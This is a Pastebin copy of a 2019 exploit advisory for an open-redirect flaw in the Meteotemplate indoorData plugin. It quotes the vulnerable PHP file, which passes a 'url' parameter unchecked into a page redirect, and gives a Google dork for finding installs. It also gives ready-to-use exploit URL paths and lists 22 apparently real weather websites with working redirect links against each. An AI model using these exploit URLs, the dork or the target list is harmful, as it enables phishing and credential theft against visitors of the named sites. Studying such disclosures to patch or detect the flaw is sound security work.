Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ########################################################################################
- # Exploit Title : Meteotemplate 17.1 Nectarine indoorData Plugins 4.0 Open Redirection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 07/03/2019
- # Vendor Homepage : meteotemplate.com
- # Software Download Link : meteotemplate.com/web/downloadRequest.php?file=indoorData_4.0
- # Software Information Link : meteotemplate.com/web/plugins.php
- # Software Version : 4.0 and previous versions.
- Vulnerable Versions for MeteoTemplate
- Meteotemplate 4.1 Mango
- Meteotemplate 6.0 Blueberry
- Meteotemplate 10.0 Banana
- Meteotemplate 11.0 Passion Fruit
- Meteotemplate 13.0 Lemon
- Meteotemplate 16.0 Physalis
- MeteoTemplate 17.0 Nectarine
- MeteoTemplate 17.1 Nectarine
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : High
- # Google Dorks : inurl:"/plugins/indoorData/"
- # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019030060
- ########################################################################################
- # Description about Software :
- ***************************
- This plugin creates a completely new section in your template, which has pages similar
- to your weather station pages, but uses data for indoor temperature and indoor humidity.
- ########################################################################################
- # Impact :
- ***********
- This web application Meteotemplate 17.1 Nectarine indoorData Plugins 4.0 accepts a user-controlled input that
- specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks.
- An http parameter may contain a URL value and could cause the web application to redirect the request to the
- specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam
- and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts
- have a more trustworthy appearance. Open redirect is a failure in that process that makes it possible for attackers
- to steer users to malicious websites. This vulnerability is used in phishing attacks to get users to visit malicious
- sites without realizing it. Web users often encounter redirection when they visit the Web site of a company whose name
- has been changed or which has been acquired by another company. Visiting unreal web page user's computer becomes
- affected by malware the task of which is to deceive the valid actor and steal his personal data.
- ########################################################################################
- # Vulnerable Source Code : [ indoorRedirect.php ]
- *********************************************
- <?php
- include("../../config.php");
- include($baseURL."css/design.php");
- include($baseURL."header.php");
- $address = urldecode($_GET["url"]);
- if(!file_exists("settings.php")){
- echo "Missing settings file, create one using the plugin setup.";
- die();
- }
- else{
- include("settings.php");
- }
- if($indoorVisibility!="public"){
- if (session_status() == PHP_SESSION_NONE) {
- session_start();
- }
- if($_SESSION['user']!="admin"){
- die ("Unauthorized access");
- }
- }
- ?>
- <html>
- <head>
- <?php metaHeader()?>
- <style>
- #loading{
- background-color: transparent;
- height: 100%;
- width: 100%;
- position: fixed;
- z-index: 1;
- margin-top: 0px;
- top: 0px;
- }
- #loading-center{
- width: 100%;
- height: 100%;
- position: relative;
- }
- #loading-center-absolute {
- position: absolute;
- left: 50%;
- top: 50%;
- height: 200px;
- width: 200px;
- margin-top: -100px;
- margin-left: -100px;
- }
- .object{
- -moz-border-radius: 50% 50% 50% 50%;
- -webkit-border-radius: 50% 50% 50% 50%;
- border-radius: 50% 50% 50% 50%;
- position: absolute;
- border-left: 5px solid #FFF;
- border-right: 5px solid #FFF;
- border-top: 5px solid transparent;
- border-bottom: 5px solid transparent;
- -webkit-animation: animate 2s infinite;
- animation: animate 2s infinite;
- }
- #object_one{
- left: 75px;
- top: 75px;
- width: 50px;
- height: 50px;
- }
- #object_two{
- left: 65px;
- top: 65px;
- width: 70px;
- height: 70px;
- -webkit-animation-delay: 0.1s;
- animation-delay: 0.1s;
- }
- #object_three{
- left: 55px;
- top: 55px;
- width: 90px;
- height: 90px;
- -webkit-animation-delay: 0.2s;
- animation-delay: 0.2s;
- }
- #object_four{
- left: 45px;
- top: 45px;
- width: 110px;
- height: 110px;
- -webkit-animation-delay: 0.3s;
- animation-delay: 0.3s;
- }
- @-webkit-keyframes animate {
- 50% {
- -ms-transform: rotate(180deg);
- -webkit-transform: rotate(180deg);
- transform: rotate(180deg);
- }
- 100% {
- -ms-transform: rotate(0deg);
- -webkit-transform: rotate(0deg);
- transform: rotate(0deg);
- }
- }
- @keyframes animate {
- 50% {
- -ms-transform: rotate(180deg);
- -webkit-transform: rotate(180deg);
- transform: rotate(180deg);
- }
- 100% {
- -ms-transform: rotate(0deg);
- -webkit-transform: rotate(0deg);
- transform: rotate(0deg);
- }
- }
- </style>
- </head>
- <body onload="redirectpage()">
- <div id="loading">
- <div id="loading-center">
- <div id="loading-center-absolute">
- <div class="object" id="object_four">
- </div>
- <div class="object" id="object_three">
- </div>
- <div class="object" id="object_two">
- </div>
- <div class="object" id="object_one">
- </div>
- </div>
- </div>
- </div>
- </body>
- <script>
- function redirectpage(){
- window.location.href = "<?php echo $address ?>";
- }
- </script>
- </html>
- ########################################################################################
- # Open Redirection Exploit :
- **************************
- /template/plugins/indoorData/indoorRedirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /plugins/indoorData/indoorRedirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /meteo/plugins/indoorData/indoorRedirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /meteotemplate/plugins/indoorData/indoorRedirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /wx/plugins/indoorData/indoorRedirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- ########################################################################################
- # Example Vulnerable Sites :
- *************************
- [+] meteotemplate.com/template/plugins/indoorData/indoorRedirect.php?url=https://cxsecurity.com/
- [+] meteonieuw-vennep.nl/template/plugins/indoorData/indoorRedirect.php?url=https://cxsecurity.com/
- [+] orzepowice24.pl/template/plugins/indoorData/indoorRedirect.php?url=https://cxsecurity.com/
- [+] andretti.pl/template/plugins/indoorData/indoorRedirect.php?url=https://cxsecurity.com/
- [+] lesendrivesmeteo.fr/template/plugins/indoorData/indoorRedirect.php?url=https://cxsecurity.com/
- [+] hetweeropurk.nl/template/plugins/indoorData/indoorRedirect.php?url=https://cxsecurity.com/
- [+] wetter-lehmschlenke.de/template/plugins/indoorData/indoorRedirect.php?url=https://cxsecurity.com/
- [+] fernandezvillatoro.es/meteo/plugins/indoorData/indoorRedirect.php?url=https://cxsecurity.com/
- [+] tistrup.nu/template/plugins/indoorData/indoorRedirect.php?url=https://cxsecurity.com/
- [+] kummersheim24.de/plugins/indoorData/indoorRedirect.php?url=https://cxsecurity.com/
- [+] vejr.arloese.dk/template/plugins/indoorData/indoorRedirect.php?url=https://cxsecurity.com/
- [+] vojta66.cz/plugins/indoorData/indoorRedirect.php?url=https://cxsecurity.com/
- [+] seremange-meteolive.franceserv.com/meteotemplate/plugins/indoorData/indoorRedirect.php?url=https://cxsecurity.com/
- [+] meteo.fotoli.eu/wx/plugins/indoorData/indoorRedirect.php?url=https://cxsecurity.com/
- [+] wetter-hiltenfingen.euro-picture.de/plugins/indoorData/indoorRedirect.php?url=https://cxsecurity.com/
- [+] info-wetter-pohlheim.de/plugins/indoorData/indoorRedirect.php?url=https://cxsecurity.com/
- [+] weather-hered.hu/template/plugins/indoorData/indoorRedirect.php?url=https://cxsecurity.com/
- [+] inselmini.ddns.net/plugins/indoorData/indoorRedirect.php?url=https://cxsecurity.com/
- [+] chameleoncyber.com/plugins/indoorData/indoorRedirect.php?url=https://cxsecurity.com/
- [+] lindaleweather.com/plugins/indoorData/indoorRedirect.php?url=https://cxsecurity.com/
- [+] lobwx.com/template/plugins/indoorData/indoorRedirect.php?url=https://cxsecurity.com/
- [+] monselicemeteo.altervista.org/plugins/indoorData/indoorRedirect.php?url=https://cxsecurity.com/
- ########################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ########################################################################################
Advertisement
Add Comment
Please, Sign In to add comment